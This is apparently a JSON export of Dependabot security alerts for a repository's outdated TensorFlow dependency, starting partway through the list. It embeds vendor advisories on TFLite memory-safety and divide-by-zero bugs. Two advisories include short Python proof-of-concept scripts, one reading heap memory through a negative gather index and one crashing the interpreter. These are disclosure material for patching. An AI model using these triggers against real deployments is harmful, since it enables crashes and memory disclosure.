                    "url": "https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28"
                },
                {
                    "url": "https://github.com/advisories/GHSA-rhrq-64mq-hf9h"
                }
            ],
            "published_at": "2021-08-25T14:40:16Z",
            "updated_at": "2023-02-09T19:23:49Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                "score": 5.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-369",
                    "name": "Divide By Zero"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/362",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/362",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 361,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-c545-c4f9-rf6v",
            "cve_id": "CVE-2021-37685",
            "summary": "Heap OOB in TFLite",
            "description": "### Impact\nTFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data:\n\n```cc\n  if (axis < 0) { \n    axis = input_dims.size + 1 + axis;\n  }   \n  TF_LITE_ENSURE(context, axis <= input_dims.size);\n\n  TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1);\n  for (int i = 0; i < output_dims->size; ++i) {\n    if (i < axis) {\n      output_dims->data[i] = input_dims.data[i];\n    } else if (i == axis) {\n      output_dims->data[i] = 1;\n    } else {\n      output_dims->data[i] = input_dims.data[i - 1];\n    }\n  }\n```\n\nIf `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`).\n\n### Patches\nWe have patched the issue in GitHub commit [d94ffe08a65400f898241c0374e9edc6fa8ed257](https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-c545-c4f9-rf6v",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37685",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c545-c4f9-rf6v"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37685"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257"
                },
                {
                    "url": "https://github.com/advisories/GHSA-c545-c4f9-rf6v"
                }
            ],
            "published_at": "2021-08-25T14:40:09Z",
            "updated_at": "2023-02-09T19:23:49Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "score": 5.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-125",
                    "name": "Out-of-bounds Read"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/361",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/361",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 360,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-jwf9-w5xm-f437",
            "cve_id": "CVE-2021-37687",
            "summary": "Heap OOB in TFLite's `Gather*` implementations",
            "description": "### Impact\nTFLite's [`GatherNd` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather_nd.cc#L124) does not support negative indices but there are no checks for this situation.\n\nHence, an attacker can read arbitrary data from the heap by carefully crafting a model with negative values in `indices`.\n\nSimilar issue exists in [`Gather` implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/gather.cc).\n\n```python\nimport tensorflow as tf\nimport numpy as np\ntf.compat.v1.disable_v2_behavior()\n\nparams = tf.compat.v1.placeholder(name=\"params\", dtype=tf.int64, shape=(1,))\nindices = tf.compat.v1.placeholder(name=\"indices\", dtype=tf.int64, shape=())\n\nout = tf.gather(params, indices, name='out')\n\nwith tf.compat.v1.Session() as sess:\n   converter = tf.compat.v1.lite.TFLiteConverter.from_session(sess, [params, indices], [out])\n   tflite_model = converter.convert()\n\ninterpreter = tf.lite.Interpreter(model_content=tflite_model)\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nparams_data = np.reshape(np.array([1], dtype=np.int64), newshape=(1,))\nindices_data = np.reshape(np.array(-10, dtype=np.int64), newshape=())\ninterpreter.set_tensor(input_details[0]['index'], params_data)\ninterpreter.set_tensor(input_details[1]['index'], indices_data)\n\ninterpreter.invoke()\n```\n\n### Patches\nWe have patched the issue in GitHub commits [bb6a0383ed553c286f87ca88c207f6774d5c4a8f](https://github.com/tensorflow/tensorflow/commit/bb6a0383ed553c286f87ca88c207f6774d5c4a8f) and [eb921122119a6b6e470ee98b89e65d721663179d](https://github.com/tensorflow/tensorflow/commit/eb921122119a6b6e470ee98b89e65d721663179d).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security  guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-jwf9-w5xm-f437",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37687",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-jwf9-w5xm-f437"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37687"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/bb6a0383ed553c286f87ca88c207f6774d5c4a8f"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/eb921122119a6b6e470ee98b89e65d721663179d"
                },
                {
                    "url": "https://github.com/advisories/GHSA-jwf9-w5xm-f437"
                }
            ],
            "published_at": "2021-08-25T14:40:02Z",
            "updated_at": "2023-02-09T19:23:46Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "score": 5.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-125",
                    "name": "Out-of-bounds Read"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/360",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/360",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 359,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-vcjj-9vg7-vf68",
            "cve_id": "CVE-2021-37688",
            "summary": "Null pointer dereference in TFLite",
            "description": "### Impact\nAn attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service:\n\n```python\nimport tensorflow as tf\n\nmodel = tf.keras.models.Sequential()\nmodel.add(tf.keras.Input(shape=(1, 2, 3)))\nmodel.add(tf.keras.layers.Dense(0, activation='relu'))\n\nconverter = tf.lite.TFLiteConverter.from_keras_model(model)\ntflite_model = converter.convert()\n\ninterpreter = tf.lite.Interpreter(model_content=tflite_model)\ninterpreter.allocate_tensors()\n\ninterpreter.invoke()\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/internal/optimized/optimized_ops.h#L268-L285) unconditionally dereferences a pointer.\n\n```cc\n  if (y4 > 1) {\n    // ...\n  } else {\n    for (int i0 = 0; i0 < y0; ++i0) {\n      const T* input2_data_ptr = nullptr;\n      for (int i1 = 0; i1 < y1; ++i1) {\n        input2_data_ptr = input2_data_reset;\n        for (int i2 = 0; i2 < y2; ++i2) {\n          scalar_broadcast_f(y3, params, *input1_data_ptr, input2_data_ptr,\n                             output_data_ptr);\n        }\n      }\n    }\n  }\n```\n\n### Patches\nWe have patched the issue in GitHub commit [15691e456c7dc9bd6be203b09765b063bf4a380c](https://github.com/tensorflow/tensorflow/commit/15691e456c7dc9bd6be203b09765b063bf4a380c).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang of Baidu Security.",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-vcjj-9vg7-vf68",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37688",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vcjj-9vg7-vf68"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37688"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/15691e456c7dc9bd6be203b09765b063bf4a380c"
                },
                {
                    "url": "https://github.com/advisories/GHSA-vcjj-9vg7-vf68"
                }
            ],
            "published_at": "2021-08-25T14:39:54Z",
            "updated_at": "2023-02-09T19:23:46Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "score": 7.8
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/359",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/359",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 358,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-wf5p-c75w-w3wh",
            "cve_id": "CVE-2021-37689",
            "summary": "Null pointer dereference in TFLite MLIR optimizations",
            "description": "### Impact\nAn attacker can craft a TFLite model that would trigger a null pointer dereference, which would result in a crash and denial of service:\n\nThis is caused by the MLIR optimization of `L2NormalizeReduceAxis` operator. The [implementation](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/compiler/mlir/lite/transforms/optimize.cc#L67-L70) unconditionally dereferences a pointer to an iterator to a vector without checking that the vector has elements:\n\n```cc\nbool L2NormalizeReduceAxis(Value sq_op, DenseElementsAttr axis) {\n  if (sq_op.getType().cast<ShapedType>().getRank() - 1 ==\n          *axis.getValues<int>().begin() ||\n      *axis.getValues<int>().begin() == -1) {\n      // ...\n  }\n  // ...\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [d6b57f461b39fd1aa8c1b870f1b974aac3554955](https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n  \n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n          \n### Attribution              \nThis vulnerability has been reported by Yakun Zhang of Baidu Security.",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-wf5p-c75w-w3wh",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37689",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wf5p-c75w-w3wh"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37689"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/d6b57f461b39fd1aa8c1b870f1b974aac3554955"
                },
                {
                    "url": "https://github.com/advisories/GHSA-wf5p-c75w-w3wh"
                }
            ],
            "published_at": "2021-08-25T14:39:36Z",
            "updated_at": "2023-02-09T19:23:43Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "score": 7.8
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/358",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/358",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 357,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-cfpj-3q4c-jhvr",
            "cve_id": "CVE-2021-37680",
            "summary": "Division by zero in TFLite",
            "description": "### Impact\nThe implementation of fully connected layers in TFLite is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/fully_connected.cc#L226):\n\n```cc\nconst int batch_size = input_size / filter->dims->data[1];\n```\n\nAn attacker can craft a model such that `filter->dims->data[1]` is 0.\n\n### Patches\nWe have patched the issue in GitHub commit [718721986aa137691ee23f03638867151f74935f](https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360. Concurrently, it has also been reported by Yakun Zhang of Baidu Security.",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-cfpj-3q4c-jhvr",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37680",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cfpj-3q4c-jhvr"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37680"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/718721986aa137691ee23f03638867151f74935f"
                },
                {
                    "url": "https://github.com/advisories/GHSA-cfpj-3q4c-jhvr"
                }
            ],
            "published_at": "2021-08-25T14:40:38Z",
            "updated_at": "2023-02-09T19:22:53Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                "score": 5.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-369",
                    "name": "Divide By Zero"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/357",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/357",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 356,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-4c4g-crqm-xrxw",
            "cve_id": "CVE-2021-37682",
            "summary": "Use of unitialized value in TFLite",
            "description": "### Impact\nAll TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200):\n\n```cc\n    const auto* affine_quantization =\n        reinterpret_cast<TfLiteAffineQuantization*>(\n            filter->quantization.params);\n```\n\nThe issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code.\n\n### Patches\nWe have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887),\n[4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360. ",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-4c4g-crqm-xrxw",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37682",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4c4g-crqm-xrxw"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37682"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538"
                },
                {
                    "url": "https://github.com/advisories/GHSA-4c4g-crqm-xrxw"
                }
            ],
            "published_at": "2021-08-25T14:40:32Z",
            "updated_at": "2023-02-09T19:21:15Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "medium",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
                "score": 4.4
            },
            "cwes": [
                {
                    "cwe_id": "CWE-908",
                    "name": "Use of Uninitialized Resource"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "medium",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/356",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/356",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    }
]